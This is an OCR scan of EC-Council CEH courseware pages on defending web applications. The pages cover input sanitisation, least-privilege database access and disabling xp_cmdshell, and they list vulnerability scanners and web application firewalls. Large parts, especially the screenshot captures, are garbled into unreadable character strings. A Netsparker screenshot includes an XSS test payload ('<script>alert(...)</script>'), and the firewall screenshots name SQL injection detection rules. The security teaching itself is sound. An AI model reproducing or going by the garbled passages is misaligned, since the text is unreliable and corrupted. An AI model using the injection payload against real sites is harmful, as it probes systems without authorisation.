214 H o w t o D e f e n d A g a i n s t W e b A p p l i c a t i o n A t t a c k s C E H M a k e LD A P f ilte r as s pe cific as p o ssib le Operating System LDAP Server Custom Error Page Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.. ~ H o w t o D e f e n d A g a i n s t W e b A p p l i c a t i o n A t t a c k s To defend against w eb application attacks, you can follow th e c o u n term easu res stated previously. To protect th e w eb server, you can use WAF firewall/ids and filter packets. You n eed to constantly u p d ate th e softw are using patches to keep th e server up-to-date and to protect it from attackers. Sanitize and filter user input, analyze th e source code for SQL injection, and minimize use of third-party applications to protect th e w eb applications. You can also use stored p rocedures and p a ra m e te r queries to retrieve data and disable verbose error m essages, which can guide th e attacker with so m e useful inform ation and use custom error pages to protect th e w eb applications. To avoid SQL injection into th e database, con n ect using a non-privileged account and grant least privileges to th e database, tables, and colum ns. Disable c o m m a n d s like xp_cm dshell, which can affect th e OS of th e system. M odule 13 Page 1936

215 yy Perform input validation l i i i l י 11 1 Configure the firewall to deny external ICMP traffic access Shut down the unnecessary services and ports _ 5 Attacker Login Form Internet Use WAF Firewall /IDS and filter packets Keep patches current Connect to the database using non-prlvileged account Use stored procedures and parameter queries Grant least privileges to the database, tables, and columns Web Application Analyze the source code for SQL injection Minimize use o f 3rd party apps * * S a n itiz e a n d f ilt e r u s e r in p u t Disable commands like xp_cmdshell Perform dynamic testing and source code analysis Operating System LDAP Server Make LDAP filter as specific as possible A Disable verbose error messages and use custom error pages 7? \ Custom Error Page FIGURE 13.61: H o w to D efe nd A g a in st W e b A p p lic a tio n A tta cks M odule 13 Page 1937 All Rights Reserved. Reproduction is Strictly Prohibited.

216 M o d u l e F lo w W eb A pp Pen Testing 0 י I, W eb A pp C oncepts & W eb A pp T hreats " * S C o u n term easu res Hacking M ethodology ^ ^ M o d u l e F l o w Now w e will discuss w eb application security tools. W eb application security tools help you to d etec t th e possible vulnerabilities in w eb applications autom atically. Prior to this, w e discussed w eb application co u n te rm e a su re s th a t prevent attackers from exploiting w e b applications. In addition to co u n term easu res, you can also em ploy security tools to protect your w e b applications from being hacked. Tools in addition to th e co u n te rm e a su re s offer m ore protection. ^ W e b A pp Pen Testing W e b A pp C oncepts Security Tools W e b A pp T hreats C o u n te rm e a su re s is! Hacking M eth o d o lo g y W e b A pplication Hacking Tools!L 3 O k M odule 13 Page 1938

217 This section is dedicated to th e security tools th a t protect w e b applications against various attacks. M odule 13 Page 1939

218 W e b A p p l i c a t i o n S e c u r i t y T o o l : r E u A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r i J A c u n e tix W VS checks w e b a p p lic a tio n s fo r SQL in je c tio n s, c ro s s -s ite s c rip tin g, etc. 6 It includes advanced p e n e tra tio n te s tin g to o ls, such as th e HTTP Editor and the HTTP Fuzzer 6 P o rt scans a w e b se rve r and runs s e cu rity checks against n e tw o rk services e Tests w e b fo rm s and passw ordp ro te c te d areas s It includes an a u to m a tic c lie n t s c rip t a n a ly z e r a llo w in g fo r s e cu rity te s tin g o f Ajax and W eb 2.0 applications : File Actions Took Conflguacicn Help J Nov Scan [fe J Tcol -Expo-cr a Web Viin-rAMy S a n a 0 Web S ta r r B -G Tod* Sne Oa«ter >*{ i : p T a ^ iif n ie Sjbdonah Scanner ; 08Msam«r : OHTTPEdto ^ * Hnpsmrte vfchtpuzjc : S» n * A1.rt*>P «fpe*r '»C O w e < te * Jt»web S<rvcc & Web Se^vrr* Searme ^ Web Se v«?e* td * r B-itJ 91x«ton * Co li 1CTG eneral *: S,*Hl'gv ot» > 1j»: 5 SP^ff-ae'U»a»tr5 V er so In fw m ow n t \ S^part Ctntm -g ) LKr UMT M«1.«(p0C ] AcuStrsa 4 : : Acunetix Web Vulnerability Scanner (Free Edition) _ 3 a *> a 3 I i 1 - J *^1 at Rpperi y-! il JRl:!ht^)://tefattpret.vtinwel~* Piofife: D?fajll S c o n R e t t* * gjj Alerts summary 77 alerts - 0 S:an T>reac 1( htto:/. tgs:aspnct.v<jrr*cb. *>I B A W >A e t 3 (7 7 ) A acunetix threot levol 5 O A S S J e sa d d n q C 1 a d e V jn e fa b lt <L * O Bed SQL Imrcson PJ» O cn > * site scro trg (vented) CIO) Q SQL ipar (21) (3] ireseace odcaccn eror * O יי» O ASPJETef««r ne*m9-{l) ft O Crow Prone Senjlrtg (S] S 9 O U «. * J e - 0J s a ««1* n t n J eai» O lo o n p f lg e tw M o o 'd o u e w r g o tta c 9 O OPTIONS * c to d eneblid (1 ) S ^ S n w i C o d» * V ia u l Sk u f Dai) 1»1 ^ b-cr psoc web sarvar r c90 dad > ^ 006: Prcntp ^ ntpnikn* for l>1i» O < * 0 6 : :'0e t x a y.r e t s e r s מ <c fl i : lo g n p a g e CIO) fi O type Input wltt *utocofttd v Ytrr.o+1 : : SQLn «a n ( Srd - fr,mine»t.a%px' a 10*0 O lj ij /, Mushed scanning :22.32, Savno scan זre»J!30 database :32.39, Dcnr wv n, b d9»«r :32.39, Fua *» Duffer*. Level 3: High ToUl alctto found O High Mwllum O >nw O informational 2j target information Acunetix Threat Level J One or more hign seventy type vulnerabilities have been dtsccrrred b» west wtneomtms 3rd conpro T1;«tne backend database anfl'or de*xe you' ht1p://tett81pnetvuinweb ri 7123 MQuMti Stan It flnuhtd r 4, Copyright by EC-Gauactl. All Rights Reserved. Reproduction is S trictly Prohibited. Ff W e b A p p l i c a t i o n S e c u r i t y T o o l : A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r Source: h ttp://w w w.acunetix.com Acunetix W eb Vulnerability Scanner autom atically checks your w e b applications for SQL injection, XSS, and o th er w eb vulnerabilities. It includes advanced penetration testing tools, such as th e HTTP Editor and th e HTTP Fuzzer. It port scans a w eb server and runs security checks against netw ork services. It even tests w eb form s and p assw o rd -p ro tected areas. The autom atic client script analyzer allows for security testing of Ajax and W e b 2.0 applications. M odule 13 Page 1940

219 In File Actions Tools Configuration Help Acunetix Web Vulnerability Scanner (Free Edition) 1-1 A - > J I New bean '? K 2 < י * & Tools ן Explore; 0 j ^ * י A Report / Star: UR.: Profile: Default a Web Vulnerablity Scanner web scanner B 0 7 Toola H 5 fr Site Crawler f \ i Target Finder... H Subdcmain Scanner Bind SQL Injector HTTP Editor ^ HTTP Sniffer I HTTP h - d Authentication Tester j ~ y Compare Resdts : B -fi? Web Servces B Web Servces Scanner Web Servces Editor Configuration }* S i Application Settinos ; h - 8 Scan Settings...Scannng Profiles H -f^ r Generol Ready Program Lpdates 23< C T Version Information-- j f Licensng ^ support center Purchase )User Manual (html User Manual (pdf AcuSensor # ' ] <( Scan Results - [a ] Scan Thread 1 ( - B Web Alerts (77) (3 0 ASP.NET Padcmg Drade Viinerab* ffl 40 bind SQL injenxx (8) S ^ Cross Site Scrpbng (verified} (10) B 0 SQL injection (verified] (21) B C Application error messaoe (3) B 0 ASP.NET error message (1) B 0 Cross Fra-ne Scripting (6) B 0 User credentials a e sent in dear te. B 0 Login page password-guessing attec B 0 CPTIONS metnod s erabled (1) B ^ Session Cookie without Secure flag B 0 Error page Web Serve versior dsd B 0 QHDB: Frontpage extensions for Uni B 0 QHDB: Possible ASP.fCT sensitve i B 0 QOB : Tywcallogh paje (10) B 0 Password type input with autocompt v < _ Ml j > 1 Activity V/indow Alwts summary A a c u n e tix th re a t level Level 3: High Total alerts found 0 High O M edium O low 0 Informational :30.02, SQL njection (venfied) Treadnews.aspx* cn pararreter *id' :3237, Finished scanning , Saving scon results todatabatc :32.39, Done saving to database :32.39, Hush Ne butlers. A^icaton''(^] Error Log 77 alerts Acunetix Threat Level 3 - a star: One or more highseveritytype vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.,jj Target information t!ttp://testaspnet.vulnweb.com:80/ ^ ^tab ftia 7322 requests 1 * Progress scan is rmisned FIGURE 13.62: A cunetix W eb V u ln e ra b ility Scanner Tool Screenshot M odule 13 Page 1941

220 W e b A p p l i c a t i o n S e c u r i t y T o o l : W a t c h e r W e b S e c u r i t y T o o l C E H J W atcher is a plugin fo r th e F id d le r HTTP pro xy th a t passively audits a w eb app lica tion to fin d security bugs and com pliance issues a u tom atically ץ, * / Q 5HWo jg Iwpettcxs I / *utoreapondir Request Buoa WfaSaK I _ E Log I. rmch; 1 v 8' ID Pas J Header - Check tm cathe-camml HTTP header met to the regorg' va x וי*> * 0 3*«that a Cortart -Type neattr U hciuded h ths HTTP response and ^e>t8 when t Header Cheeks that IE?* XSS proteeten Bier Koa r»tf been ebabled by the Webappteabon OncMiHattheXCONTENT-TYPEOPTONSiJefcnje aflarvt MlME«fRnflha»b»»n dedjred J Header Cheeks th!he XfRAMEOPTlONS header n berg set for defer aqaral CkkJaefcro'attacks B Heady Lccfc ter ««ahafrytlcalicr prctooolr Lock for* ac!i«<»nar1pc4cytiks 0 rtor *ten 0<ac*«*re Owck for conwon mt 9 mmoagw wtlinsd by database* *Hcfi may rda e 9311! rfy-bcn Dadeare Oteek for dubom eoiment that vnairartfuther attention ן 7 ז 7 rtomaton D*3c»je LooHlotevMlNe rtamatieripajesdttrojtfi HTTPwjjwt ul«twl*w*»a look for semttve rfenrater paiied Ihrou^i URL [Mrarreteis fti Ja<*«utrt - bu wr«^ r*1crt«coj*for uwc<d#>3r0us r ji1)ftk<j«xh *toow SDLO* M/A OWASPASV12 OWASf ASVU w».'.wbsx TSrt < * k mil srnnrh MTMl convnt, ineludmo comment! k common error * mrsinor returned by ptmtewns sue! as Af.PNTT and Web savers such 09 IIS ond Apoebe Y<hh 1ftonfioure Ibe l!v of common debug mer-wiges» look ter ( 6w» t ) Export NeAod HTNLRwott it* nge * *י* ttbamg URU 'So J ft*.'* r-otfcubtad. tan/m febw/ch««fc. Pmv.ltwCanbeUd.Jr/aiu vl v«<t.1;>v?ul mrtmtvdw* vmtreluft*a «afrart r r t t h o S c» rc lavaanix ivonti Ahrti may bo 1J l»*i n w ««Anrd m #» י** 40 נז 0 data of an crto.nl' events PH> v>arnng PH»&10r Vi'arrrg: Carr mwdiaroiis C 3 S 3 B 3 watdier Web Security Tool vt.3.0, Copy right C 2010 C3;3ba..C- AJI djitts reserved- tv* j «rxjut m i: ytmralie fordtntw folow^o data of ac 'crrroueeow' event! event; -rp>- f»aa fartd m the felo»ng data of ar 'onerrof' User י 3 c a s a s a» Aatc V/cDSecurity Tool vlj.o, CooyriQht 20:0 Casaoa Security. LLC. All risnu reserved. Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n S e c u r i t y T o o l : W a t c h e r W e b S e c u r i t y J L T o o l Source: h ttp ://w w w.casab a.co m W atc h er is a plugin for th e Fiddler HTTP proxy th a t passively audits a w eb application to find security bugs and com pliance issues autom atically. Passive detection m e a n s it's safe for production use. It detects w eb-application security issues and operational configuration issues. M odule 13 Page 1942

221 FIGURE 13.63: W a tc h e r W e b S e curity T o ol S creenshot M odule 13 Page 1943

222 Web Application Security Scanner: Netsparker C E H J J N e ts p a rk e r p e rfo rm s a u to m a te d c o m p re h e n s iv e w e b a p p lic a tio n s c a n n in g f o r v u ln e ra b ilitie s such as SQL in jection, cross-site scripting, re m o te code in jection, etc. I t d e liv e rs d e te c tio n, c o n fir m a tio n, a n d e x p lo ita tio n o f v u ln e ra b ilitie s in a s in g le in te g ra te d e n v iro n m e n t s fa 11 CMnWSw י C ross-site S cripting URL l a x / / 1c5tJ7.ne2Mrt«r.cQm:8l8! 1 fflefwra/msidyreftected32 P* ד * H * י *» 010! $ j. Krtpt: PARAMETER MAME ptram PARAMETER TVPC (Jjfryitnnj ATTACK PATTtftM a p1»4k»t(0»0000l&)< V U L N E R A B IL IT Y D E T A IL S XSS (O w rm t SoHAmu) d v «1 mn tv «*«-.**«dr*on1 kjha (! **C'pC V W c 1 U *<)»> o* a0pbcat»n T**s 1lo«c y t i* o*p4rtun*14«moith t cvr<nt Mixyi *x m«r t* tfunfm] Vm kvov (4 rtw* 0 M)* b» י* wtvi anrt»*yro<t»*m» c ח ג k i :.0 נ.ו Kl C LA SSIF IC A T IO N t u Liii OWAV a: ^ ר ז י י * Croupbuctb) Ml 9Vjlnt<jb1KvT>o«Scar and Confarratcnfirntsd J fvory: SystemlMoneJ h ttp://www. ma vitunasecurity. com Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n S e c u r i t y S c a n n e r : N e t s p a r k e r " v Source: w w.m avitunasecurity.com Netsparker can find and report on security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all w e b applications, regardless of th e platform and th e technology they are built on. It allows you to resolve security problem s before they're actually m isused and co m p ro m ised by unknow n attackers. M odule 13 Page 1944

223 Q ] tcrst37.nebpdrker.eom - Netipaikei ( Mavituna Security Limited -1 1 Seat) 1 5 r s 1 r w 1 I File tyew Reporting Settings C om m unity fcjelp ; Start fcjew Scon j? Stoit u»1 j Vulnerability Browser View HTTP Request / Response S test37.netspahcer.com: & dilemma xsstb 0 reflected 0 32.php Apache Version 1 - Apache Version PHP Version Dis ±J *?param S< Cross-site י{ Controlled Scan Retest C r o s s - s ite S c rip tin g URL PARAMETER NAME PARAMETER TYPE ATTACK PATTERN CONFIRMED netsparker.com: 8081/dllemma/xsstb, ref lected/3z.php param=<script>alert(0x000016)<! script? param Querystring <scrlpt>alert(0x000016)</scrlpt> bean Nnished 0002 / 0002 Scan Inform ation Current Speed: 2,6rcq.'5cc Average Speed: 3,7 req/sec Total Requests: 37 ז R#qu»et< 0 F xiftd HEAD Requests: 0 Elapsed Tim e : 00:00:10 VULNERABILITY DETAILS XSS (C ro s s -s ite S c rip tin g ) a llo w s a n a tta c k e r to e x e c u te a d y n a m ic s c rip t {)avascrot, VbScript) in th e c o n te x t o f th e a p p lic a tio n. T his a llo w s s e v e ra l d f fe r e n t a tta c k o p p o r tu n itie s, m o s tly h ija c k in g th e c u r r e n t s e s s io n o f t h e u s e r o r c h a n g in g th e lo o k o f th e p a g e b y c h a n g in g th e HTML o n th e f ly t o 3te a l th e 1-1 Cross-site Scripting 1pa am) dilemma/xsstb/refle<te<j/32.php f+1 &) Apache Version Disclosure G i-ptt PHP Varcion D icdotur* G J 0 Apoche Version Is Out O f Dote Issues (*) R Encoder IT Logs (4) «CLASSIFICATION PCI P C OW ASP A2 - Group Issues by Vulnerability T/pe C Severity Scan and Confirm ation finished. jf1 Proxy: Svstem[Ncne] FIGURE 13.64: N etsparker Tool Screenshot M odule 13 Page 1945

224 W e b A p p l i c a t i o n S e c u r i t y T o o l : N S t a l k e r W e b A p p l i c a t i o n S e c u r i t y S c a n n e r EH J N-Stalker Web Application Security Scanner is an effective suite of web security assessment checks to enhance the overall security of web applications against a wide range of vulnerabilities and sophisticated hacker attacks Ifryfr > 1» > 1 N ' M-Suker M-Siaker Senw tner 5W rt5can Scan Cffcr«i N S:alker Web Application Security Scanner Free Edition J It contains all web security assessment checks such a s : v r l e Code injection» Cross-Site scripting mil.( ) Mi J (P) Low 1) \ l «MI> e Parameter tampering «Web server vulnerabilities I r. -»:«n AtMMffl 0 Sw Mjojo,.. a rh» <«T i> 5'.«U.» 1 S'.atei Sca'1-W h brae a h ttp://nstalker.com Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. f j H ^ W e b A p p l i c a t i o n S e c u r i t y T o o l : N S t a l k e r W e b _ A p p l i c a t i o n S e c u r i t y S c a n n e r Source: N-Stalker W eb Application Security Scanner provides an effective suite of w eb security assessm en t checks to en h a n c e th e overall security of your w e b applications against a w ide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your ow n assessm en t policies and requirem ents, enabling an effective w ay to m an ag e your application's SDLC, including th e ability to control inform ation exposure, d e v e lo p m en t flaws, infrastructure issues, and real security vulnerabilities th a t can be explored by external agents. It contains all w eb security a ssessm en t checks such as code injection, cross-site scripting, p a ra m e te r tam pering, w e b server vulnerabilities, etc. M odule 13 Page 1946

225 N -S ta k e r W e b A p p lic a tio n S e cu rity Scanner Free E d itio n T O N-Stakm Scanner Start Scan. En^na ft Crawler Settnga * : Threads.I Control Optons :: Cncodc UR1(PS) Ef w G tftrjj J Start Proxy URL Restriction Settings 1 Tnecut 15 t DetUS MTTR _ 1FP Keyword F*er d o t* Settlor! Seaton Mgtr* Fftera 8 : Threads control session Control spider control aise-p0s*ve 1 Control : Mtp:i/ / f t Scanner a Dashboard SitaSequance )5 J j Allowed Hoste Rejected hosts %. C i Oojects Jjl Ccckes Scrpts - )11( Mp Comments )11( n Web Forms )5( E-tnats ר ( j p Broten pages )1( Hidden FtekJs Information Leakage )1 jnerablities/ ' 0 J ht1p//l0 )+( 0 0 2/ N * ConplK* Sp11»r m*( MS D 0 7 ScanSessba ^ Co«o.«ed + ( Irto ( \ N Star; Tme Dc2C *:3 :53 C He era 4 M r jte3 8 י«9 י Spider Cr a wed URLs 15 Crawled boss 1 Defaui Paje Sz t Dries ScmEngoe To; Recues Fated Requests 0 Attacks Serf 315 *04 Errors ? Redreeten 0 s 03 high 10) Ni l (9) Low (1) inro (2) rutwort * Bytes Sent vies Received A *0 Resconse Time ms avq Transref Rite Reajest^Wrute kb/s reo/mn Status. N>Staker Scanner season is being ctosed.. [Dashboard Thread) FIGURE 13.65: N -Stalker W eb A p plicatio n S ecurity Scanner Tool Screenshot M odule 13 Page 1947

226 W e b A p p l i c a t i o n S e c u r i t y T o o l : V a m p i r e S c a n EH V am pirescan Vam pirescan allo w s users to te s t th e ir o w n Cloud and W eb ap p lica tio n s fo r basic attacks and receive L actionable results all w ith in th e ir ow n W eb portal Features e e P ro te c t y o u r w e b s ite fro m hackers Scan and p ro te c t y o u r in fra s tru c tu re and w e b a p p lic a tio n s fro m cyberth re a ts Give y o u d ire ct, a c tio n a b le in sight on high, m e diu m, and lo w risk vulnerabilities Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. ^ W e b A p p l i c a t i o n S e c u r i t y T o o l : N - S t a l k e r W e b 0,. A p p l i c a t i o n S e c u r i t y S c a n n e r Source: h ttp ://w w w.v am p iretech.co m V am pirescan allows users to test their ow n Cloud and W e b applications for basic attacks and receive actionable results all within their ow n W e b portal. It can protect your w ebsite from hackers. This tol can scan and protect your infrastructure and w eb applications from cyber-threats and can also give you direct, actionable insight on high, m edium, and low risk vulnerabilities M odule 13 Page 1948

227 Hacking Web Applications 1 Summary Security Grades A B C O I F Statistics Queued Scam Scans h Progress A ccoutt Balance Unused Services Expiring Unused Services 0 0 $0.00 Recent Activity 0 Status Wrt Site URl Drvnplion Smncr latr*t Re*uft% Q ow \ Runtw Rev** Grade HARM V«*c Vuln. M/M/l scanteil? QwSan HtathOeck 3/28/2012 2*2 PM mm /2/0 %can»e*11 SMf 3/27/2012 2:17 PM m m /214/271 scan!e*m roftw 3/24/2012 :12 AM m m /148/113 *cant**11 M#a*rvO>eA 3/13/ AM /1/0 Previous Scam scanle*l? SMr 12/1S/20U 5:18 PM m m /42/65 &M Htory <» I \ Of *? 4 * Show. S SO FIGURE 13.66: N -S talker W e b A p p lic a tio n S e curity S canner T o ol S creenshot Module 13 Page 1949 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil

228 W eb A p p licatio n S ecurity Tools C E H I H L T S a n d c a tm in i h t t p : //w w w. s y h u n t.c o m W e b s e c u rify h t t p : / / w w w. w e b s e c u rify.c o m OW ASP ZAP h t t p : / / w w w. o w a s p. o r g N e tb ru te h t t p : / / w w w. ra w lo g ic. c o m skip fish ^ j h t tp ://c o d e.g o o g le.c o m W hi X5s h t t p : / / w w w. cas a b a. c o m SecuBat V u ln e ra b ility Scanner h t tp : //s e c u b a t. c o d e p ie x. c o m f t. ' W SSA - W e b S ite S e c u rity S canning Service h ttp s ://s e c u r e.b e y o n d s e c u r ity.c o m SPIKE P ro x y h t t p : / / w w w. im m u n ity s e c. c o m R a tp ro x y h t t p : / / c o d e, g o o g le, c o m V Copyright by EC-Cauncil. All Rights Reserved. Reproduction isstrictly Prohibited. W e b A p p l i c a t i o n S e c u r i t y T o o l s W e b application security tools are w e b application security assessm en t softw are designed to thoroughly analyze today's com plex w eb applications with th e aim of finding exploitable SQL injection, XSS vulnerabilities, etc. T hese tools deliver scanning capabilities, broad a ssessm en t coverage, and accurate w eb application scanning results. C om m only used w eb application security tools are listed as follows: Q SandcatM ini available at h ttp ://w w w.sy h u n t.co m 0 OWASP ZAP available at h ttp ://w w w.o w asp.o rg 6 skipfish available at Q SecuBat Vulnerability Scanner available at h ttp://secubat.codeplex.com SPIKE Proxy available at h ttp ://w w w.im m u n itv sec.co m 0 W ebsecurify available at w w.w ebsecurify.com N etb rute available at w w.raw logic.com Q X5s available at h ttp ://w w w.casab a.co m WSSA W e b Site Security Scanning Service available at M odule 13 Page 1950

229 Ratproxv available at M odule 13 Page 1951

230 W eb A p p licatio n S ecurity Tools (C o n t d) C E H W a p iti h t t p : / / w a p i t i, s o u rc e fo rg e, n e t i p i S y h u n t H y b rid h t t p : / / w w w. s y h u n t. c o m W e b W a tc h B o t h t t p : / / w w w. e x c la m a tio n s o ft. c o m 1 M E x p lo it-m e h t tp : /'/la b s, s e c u rity c o m p a s s.c o m f r! \ K - K eepn I h t t p : / / w w w. k e e p n i. c o m ( P " W S D igger h t t p : / / w w w. m c a fe e. c o m G ra b b e r h t tp : //r g a u c h e r. in fo ם A ra c h n i h t tp : //a r a c h n i- s c a n n e r. c o m xsss h t t p : / / w w w. s v e n. d e Vega - ד ח h t t p : / / w w w. s u b g ra p h. c o m Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n S e c u r i t y T o o l s ( C o n t d ) In addition to th e previously m en tio n ed w e b application security tools, th e re are few m o re tools th a t can be used to assess th e security of w eb applications: Wapiti available at apiti.sourceforge.net W eb W atch B o t available at w w.exclam ationsoft.com KeepNI available at h ttp ://w w w.k eep n i.co m G rabber available at XSSS available at h ttp ://w w w.sv en.d e Svhunt Hybrid available at http ://w w w.sv h u n t.co m Exploit-Me available at pass.com WSDigger available at h ttp ://w w w.m cafee.co m Arachni available at Vega available at h ttp ://w w w.su b g rap h.co m M odule 13 Page 1952

231 > שc7 Ethical Hacking and Countermeasures W eb A p p licatio n F ire w a ll: dotd efender C E H Urt1fw4 ilhiul lutbm d o td e fe n d e r is a s o ftw a re based W eb A p p lic a tio n F irew all It c o m p le m e n ts th e n e tw o rk fire w a ll, IPS and o th e r n e tw o rk -b a s e d Inte rn e t security products It in spects th e HTTP/HTTPS tra ffic f o r suspicious b e h a vio r It d e te c ts and blocks SQL in je c tio n a tta c k s A Me י מיי* vew*ovomrs * «. hc *< cbtoefrnder (329days fcft) il U Event View? (Locrf) * InternetIrrfonriaaarSerו ויtl _ 4> Gbbal Settngs {2) De^aiJt Scanty FtoSe p-otec Server Ma*ng Fok:»5 [ Lpka: Patterns כ 0 ffl fel WhalBt (Perm!*d As ij 2) Pararoc ij fgtencotlnq [fl BjffwOi'eHbn a 21 SQL lr!j*ct>cr Lae chhed CB 71. CT0B-5W Sowanc י^ג,* CUc7t i 9 SQL Infection awm* ype v. sol rt-««w Suspect Single Quote (Safe) Pattern Pattern = מ Classic SQL Comment w SQL Comments Q Union Select Statement W Select Version' Statement ם P SQL CHAR Type D Q ם 5 י *יי ) Ltl uj) R«no(e ca m#nfl l*e Q) Ced* mrrten( )! m &vmdow*!* rrner «: ar 1 HJ ^ W*l Vtwna ID ^2)»*a!h lnty*ran.. aw creatי 9»ימ) ןUa U >ז flj*e]<:* <. rf*e LVaUi: :Jw *זילFTP Afttna ן Q d tdefender W SQL SYS Commands W IS SRVROLEMEMBER followed by ( ם MS SQL Specific SQL Injection ק h ttp://www. opplicure.com Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. 5 5 ^ W e b A p p l i c a t i o n F i r e w a l l : d o t D e f e n d e r Source: h ttp://w w w.applicure.com dotd efender is a softw are-based w e b application firewall th at provides additional w ebsite security against malicious attacks and w ebsite d efacem en t. It protects your w ebsite from malicious attacks. W eb application attacks such as SQL injection, path traversal, cross-site scripting, and o th er attacks leading to w ebsite d e fa c e m e n t can be prevented with dotd efender. It co m p le m e n ts th e netw ork firewall, IPS, and o th er netw ork-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior. M odule 13 Page 1953 All Rights Reserved. Reproduction is Strictly Prohibited.

232 flle Action view Favorites V/hdow Hrlp»» I B I ^ dototfender (329 daye leh) FI b ; Event Vic no (loid) Id n Internet Jrforrnaton Servictc ( O license A cscbal s#t1!rgs 0 { f Default Security FYofile (Protec J ] server Ma?icrc Upload Folders Patterns ב 0 0 laiwte#*t (Permitted Ac< 0 Ls? Parcnad 0 Encoding 0 Buffer Overflow B IGS SQL Injection User Defired t j Best Practices 0 Cross-Site Sanptrg 0 Cookie Manipulation 0 f e Path Traversal 62 Probnc Hi fe Rerote cormard Exec 0 Code Inaction ra LZ Windows Directories an 0 XM. Schema 0 LZ XPoth Injection 0 XPath Crocs Ste Scroa 0 Soroturea (Use D e fa u lt) Q Athena HT Ste (Ltec Default) SQL Injacfion י 1-1 C hoose w hich type o f SQL Injection attact-s to n tercep t 17 Suspect Single Quote (Safe) קו Pattern = Pattern י -, Comment Classic SQL F SQL Comments D 17 Union Select Statement D ם Statement Version Select SQL CHAR Type D Q -Iffl Xl r d td e fe n d e 17 SQL SYS Commands D 17 IS_SRVROLEMEMBER followed by ( D 17 MS SQL Specific SQL Injection 0 FIGURE 13.67: d o td e fe n d e r M odule 13 Page 1954

233 Hacking Web Applications W eb A p p licatio n F ire w a ll: S erverd efender VP c ( rtifwd EH ItkMJl luckm ServerDefender VP W eb ap plication firew all is designed to provide security against w e b attacks SefverDefender VP Settings Manager p o rt8 0 l-ojt <'adaton Buffer Overflow Resources Me*cds JU3 RieUpfea-s Ectpmts Common p>r«3ts SQL Injection &Z aoacfttj«9testtplng(>ss) MribicdKTWl v_ Gcnenc rut [ wrrtiratwn OiNone $l**mun.^נ 0 II. 12, H 31, 127, , 25$) C) Extended (>, <,', ו Mnmum OPwanad (L *. M.1,] *M adid Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n F i r e w a l l : S e r v e r D e f e n d e r V P Q i Source: h ttp ://w w w.p o rt8 0 so ftw are.co m The ServerD efender VP w eb application firewall is designed to provide security against w eb attacks. SDVP security will prevent data theft and breaches and sto p u n au th o rized site d efacem en t, file alterations, and deletions. Module 13 Page 1955 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil

234 ServerDefender VP Settings Manager F il Configur# H#lp se rverdefender VP WEB APPLICATION FIREWALL port80 WIN-ETLRP50T7LB m Defajlt Profile Protection for Default Web Site is ON OFF LOG ONLY O ON J Default Web Site (Custom) 4 : Sit* Status J Request Mgmt jfe/r e spo rse Mgmt / ^ \ Session Mgmt» E Mgmt Admir Options Input Vafcdation Birfer Overflow J Resources Methods URLs File Uploads ] Exceptions Generc Input Sanitization O None ( ) [0-9, 11, 12, 14-31, 127, , 255] C Extended [>, <, ך + Mnmum C Paranoid [, +Extended Samteation Action: Deny and Log Apply ] - f ServerDefender VP Settings Manager M e Configure Help s e rv e rd e fe n d e r VP WEB APPLICATION FIREWALL g REDBRICK V Default Profile V Default Web Site Administration Assets Protection for Gauntlet is ON Enforcement Level G e n e r c P iia c S ite * ] Site Status Blocked IPs Aierbng Reporting port80 OFF L O G ONLY 0 ON Show Details ServerDef endervp Statistics Snce 11/8/2011 Refresh Total Total Currently Total Currently Total HTTP Sessions Active Blocked Blocked Error Requests Created Sessions IPs IPs Count Error Statistics LogViewer S*e 1 Total 404 SQL 1 XSS I Input I Cookie 1 Other Default Web Gauntlet Administration Assets Expert View OK Cancel Apply FIGURE 13.68: S erverd efender VP M odule 13 Page 1956

235 ו R a d w a re 's A p p W a ll h t t p : / / w w w. r a d w a re. c o m B a rra c u d a W e b A p p lic a tio n F ire w a ll h ttp s : / /w w w. b a r ra c u d a n e tw o rk s. c o m nss^l T h re a ts e n try I 3 H l S tin g ra y A p p lic a tio n F ire w a ll 1 j h t t p : / / w w w. p r iv a c y w a re, c o m h t t p : / / w w w. r iv e r b e d, c o m r ' י - Q u a ly s G u a rd W AF h t t p : / / w w w. q u a ty s. c o m W IB M S e c u rity A pps can h t t p : / / w w w ib m. c o m T h re a tr a d a r h t t p : / / w w w. im p e rv a. c o m T ru s tw a v e W e b D e fe n d h ttp s : / / w w w. tru s t w a v e, c o m M o d S e c u rity 1 י ו h t t p : / / w w w. m o d s e c u rity. o r g J J B! C y b e ro a m 's W e b A p p lic a tio n F ire w a ll h t t p : / / w w w. c y b e ro a m, c o m Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. y W e b A p p l i c a t i o n F i r e w a l l s ץ W e b application firewalls secure w ebsites, w e b applications, and w eb services against know n and unknow n attacks. They prevent data theft and m anipulation of sensitive corporate and c u sto m er inform ation. C om m only used w eb application firewalls are listed as follows: R adw are's AppWall available at h ttp ://w w w.rad w are.co m T hreatsentry available at w w.privacyw are.com Q ualysg uard WAF available at w w.qualys.com T hreatr adar available at http ://w w w.im p erv a.co m M odsecurity available at h ttp://w w w.m odsecurity.org Barracuda W eb Application Firewall available at h ttp s://w w w.b arracu d an etw o rk s.co m Stingray Application Firewall available at IBM Security AppScan available at h ttp://w w w -01.ibm.com T rustw ave W ebd efend available at h ttp s://w w w.tru stw av e.co m C yberoam 's W eb Application Firewall available at h ttp ://w w w.cy b ero am.co m M odule 13 Page 1957

